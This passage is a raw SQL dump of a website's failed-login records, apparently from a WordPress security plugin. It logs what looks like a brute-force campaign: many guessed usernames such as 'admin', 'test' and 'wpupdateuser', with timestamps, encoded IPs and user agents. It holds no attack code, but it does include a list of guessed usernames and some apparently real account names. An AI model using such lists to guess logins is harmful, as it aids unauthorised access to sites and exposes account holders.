x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(303,394,1624523729.798436,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��gJ6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(304,395,1624523785.654064,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3� ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(305,405,1624524951.613959,1,'loginFailInvalidUsername','prueba',0,'\0\0\0\0\0\0\0\0\0\0��gJ6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(306,406,1624525062.292167,1,'loginFailInvalidUsername','asdf',0,'\0\0\0\0\0\0\0\0\0\0���ń�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(307,407,1624525131.129311,1,'loginFailInvalidUsername','demo1',0,'\0\0\0\0\0\0\0\0\0\0���8�T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(308,408,1624525320.491335,1,'loginFailInvalidUsername','prueba',0,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(309,411,1624525642.613581,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0���A�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(310,412,1624525753.049484,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��2ta3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(311,415,1624525997.469314,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(312,416,1624526049.505716,1,'loginFailInvalidUsername','admin1',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(313,418,1624526259.605259,1,'loginFailInvalidUsername','testing',0,'\0\0\0\0\0\0\0\0\0\0��/\\�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(314,421,1624527805.545709,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��N/ɏ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(315,422,1624529081.869408,1,'loginFailInvalidUsername','demo2',0,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(316,424,1624529183.306107,1,'loginFailInvalidUsername','alejandromartinbilbao',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(317,425,1624529184.347890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3'),(318,426,1624529250.584543,1,'loginFailInvalidUsername','testuser',0,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(319,427,1624529309.090237,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(320,427,1624529309.206339,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(321,428,1624529373.252937,1,'loginFailInvalidUsername','AnonymousFox',0,'\0\0\0\0\0\0\0\0\0\0����:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(322,430,1624529571.930010,1,'loginFailInvalidUsername','test2',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(323,431,1624529575.414622,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��h��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(324,432,1624529660.036352,1,'loginFailInvalidUsername','qwerty',0,'\0\0\0\0\0\0\0\0\0\0���i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(325,433,1624529760.342396,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(326,437,1624530020.275097,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0���y��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(327,438,1624530035.072733,1,'loginFailInvalidUsername','teste',0,'\0\0\0\0\0\0\0\0\0\0���a�1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(328,439,1624530120.663369,1,'loginFailInvalidUsername','testadmin',0,'\0\0\0\0\0\0\0\0\0\0���X�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(329,440,1624530161.893677,1,'loginFailInvalidUsername','admin123',0,'\0\0\0\0\0\0\0\0\0\0���Ǟf','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(330,441,1624530202.207375,1,'loginFailInvalidUsername','1234',0,'\0\0\0\0\0\0\0\0\0\0��]�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(331,442,1624530251.485956,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(332,443,1624530307.083465,1,'loginFailInvalidUsername','abc123',0,'\0\0\0\0\0\0\0\0\0\0��.e �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(333,447,1624530527.230304,1,'loginFailInvalidUsername','marketing',0,'\0\0\0\0\0\0\0\0\0\0��- z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(334,450,1624530639.763438,1,'loginFailInvalidUsername','private',0,'\0\0\0\0\0\0\0\0\0\0����\"x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(335,455,1624530915.993816,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(336,455,1624530916.018697,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(337,461,1624531251.066649,1,'loginFailInvalidUsername','one',0,'\0\0\0\0\0\0\0\0\0\0��g%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(338,462,1624531291.082684,1,'loginFailInvalidUsername','Jackson_Moore',0,'\0\0\0\0\0\0\0\0\0\0��$]=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(339,463,1624531375.407081,1,'loginFailInvalidUsername','abcd',0,'\0\0\0\0\0\0\0\0\0\0���G�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(340,465,1624531473.415326,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(341,473,1624531920.814635,1,'loginFailInvalidUsername','teste',0,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(342,476,1624532159.887670,1,'loginFailInvalidUsername','pepe',0,'\0\0\0\0\0\0\0\0\0\0��}�ܓ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(343,477,1624532181.402307,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0��F#ŕ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(344,477,1624532181.515748,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0��F#ŕ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(345,479,1624532311.433944,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��gJ6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(346,479,1624532311.478656,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��gJ6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(347,480,1624532329.049424,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w�U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(348,483,1624532513.007299,1,'loginFailInvalidUsername','roberto',0,'\0\0\0\0\0\0\0\0\0\0����j�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(349,484,1624532553.750880,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��.e �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(350,484,1624532553.763154,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��.e �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(351,485,1624532612.559090,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��ݏ0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(352,486,1624532653.198483,1,'loginFailInvalidUsername','wpupdateuser',0,'\0\0\0\0\0\0\0\0\0\0��l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(353,487,1624532782.481245,1,'loginFailInvalidUsername','prueba',0,'\0\0\0\0\0\0\0\0\0\0��-|Tz','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(354,488,1624532814.639341,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��ս8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(355,490,1624532982.016996,1,'loginFailInvalidUsername','review',0,'\0\0\0\0\0\0\0\0\0\0��3&)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(356,491,1624533040.268907,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(357,495,1624533283.463694,1,'loginFailInvalidUsername','technician',0,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(358,496,1624533315.850551,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(359,498,1624533464.133717,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��˫�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(360,499,1624533482.117129,1,'loginFailInvalidUsername','testing',0,'\0\0\0\0\0\0\0\0\0\0���z]c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(361,502,1624533730.537120,1,'loginFailInvalidUsername','seller2',0,'\0\0\0\0\0\0\0\0\0\0���>�A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(362,503,1624533785.395726,1,'loginFailInvalidUsername','testuser',0,'\0\0\0\0\0\0\0\0\0\0���,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(363,504,1624533850.792967,1,'loginFailInvalidUsername','hello',0,'\0\0\0\0\0\0\0\0\0\0���B�Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(364,509,1624534130.906658,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(365,510,1624534164.477942,1,'loginFailInvalidUsername','john',0,'\0\0\0\0\0\0\0\0\0\0��e\0{�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(366,520,1624534830.672697,1,'loginFailInvalidUsername','charlene',0,'\0\0\0\0\0\0\0\0\0\0��]}K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(367,520,1624534830.710457,1,'loginFailInvalidUsername','charlene',0,'\0\0\0\0\0\0\0\0\0\0��]}K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(368,521,1624534886.093475,1,'loginFailInvalidUsername','view',0,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(369,523,1624535091.786852,1,'loginFailInvalidUsername','user1',0,'\0\0\0\0\0\0\0\0\0\0��-��#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(370,524,1624535121.906557,1,'loginFailInvalidUsername','alex',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(371,525,1624535157.616081,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��>�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(372,530,1624535441.240422,1,'loginFailInvalidUsername','antonio',0,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(373,531,1624535521.779911,1,'loginFailInvalidUsername','toto',0,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(374,532,1624535581.554756,1,'loginFailInvalidUsername','demouser',0,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(375,536,1624535854.701280,1,'loginFailInvalidUsername','guest',0,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(376,537,1624535914.464504,1,'loginFailInvalidUsername','gary',0,'\0\0\0\0\0\0\0\0\0\0��g%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(377,545,1624536347.710408,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(378,551,1624536461.009057,1,'loginFailInvalidUsername','tester',0,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(379,552,1624536515.845539,1,'loginFailInvalidUsername','kadal1337',0,'\0\0\0\0\0\0\0\0\0\0��M�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(380,556,1624536882.821340,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(381,556,1624536882.832857,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(382,557,1624537001.177027,1,'loginFailInvalidUsername','Test',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(383,558,1624537132.935039,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(384,559,1624537183.574807,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0���Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(385,562,1624537471.656104,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(386,565,1624537721.671372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(387,566,1624537749.379659,1,'loginFailInvalidUsername','laura',0,'\0\0\0\0\0\0\0\0\0\0���>[�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(388,571,1624538055.144736,1,'loginFailInvalidUsername','marina',0,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(389,576,1624538362.265264,1,'loginFailInvalidUsername','john',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(390,576,1624538362.330073,1,'loginFailInvalidUsername','john',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(391,578,1624538550.935222,1,'loginFailInvalidUsername','testing123',0,'\0\0\0\0\0\0\0\0\0\0��^L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(392,579,1624538604.514583,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3�|p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(393,580,1624538606.340407,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��^L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(394,583,1624538840.735023,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gF�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(395,584,1624538885.753516,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��\r�tN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(396,587,1624539061.446980,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(397,588,1624539117.026454,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����eW','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(398,589,1624539191.412626,1,'loginFailInvalidUsername','secure',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(399,590,1624539230.462212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���2:?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(400,591,1624539290.176943,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(401,591,1624539290.265047,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(402,592,1624539351.424734,1,'loginFailInvalidUsername','test4',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(403,593,1624539400.302971,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(404,594,1624539473.343504,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(405,594,1624539473.407159,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(406,595,1624539540.522521,1,'loginFailInvalidUsername','student',0,'\0\0\0\0\0\0\0\0\0\0��]}#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(407,596,1624539580.444803,1,'loginFailInvalidUsername','tempadmin',0,'\0\0\0\0\0\0\0\0\0\0��Xc��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(408,600,1624539818.451414,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Aێ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(409,601,1624539842.844978,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(410,603,1624540020.955679,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��3&)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(411,604,1624540141.254878,1,'loginFailInvalidUsername','admin123',0,'\0\0\0\0\0\0\0\0\0\0���>\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(412,605,1624540211.009945,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(413,608,1624540392.152346,1,'loginFailInvalidUsername','abcd',0,'\0\0\0\0\0\0\0\0\0\0��-|Tz','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(414,609,1624540461.762344,1,'loginFailInvalidUsername','aaaaa',0,'\0\0\0\0\0\0\0\0\0\0�����m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(415,610,1624540491.651926,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���z]c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(416,611,1624540571.349090,1,'loginFailInvalidUsername','port',0,'\0\0\0\0\0\0\0\0\0\0�����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(417,612,1624540579.986040,1,'loginFailInvalidUsername','alejandromartinbilbao',0,'\0\0\0\0\0\0\0\0\0\0��E�c','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0'),(418,613,1624540590.027253,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E�c','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0'),(419,614,1624540628.339201,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6H8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(420,615,1624540721.122712,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���|� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(421,616,1624540735.350676,1,'loginFailInvalidUsername','patricia',0,'\0\0\0\0\0\0\0\0\0\0��D�$[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(422,618,1624540851.378937,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0��4�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(423,618,1624540851.409310,1,'loginFailInvalidUsername','admin2',0,'\0\0\0\0\0\0\0\0\0\0��4�J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(424,621,1624541004.860680,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���}z/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(425,622,1624541030.526105,1,'loginFailInvalidUsername','ceshi',0,'\0\0\0\0\0\0\0\0\0\0���H�D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(426,623,1624541084.631374,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(427,627,1624541255.527099,1,'loginFailInvalidUsername','antawn',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(428,627,1624541255.551543,1,'loginFailInvalidUsername','antawn',0,'\0\0\0\0\0\0\0\0\0\0��>���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(429,629,1624541371.585190,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0��}�ܓ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(430,633,1624541600.952439,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(431,634,1624541656.095914,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(432,637,1624541843.030110,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(433,638,1624541887.569618,1,'loginFailInvalidUsername','bigikala',0,'\0\0\0\0\0\0\0\0\0\0���i�9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; 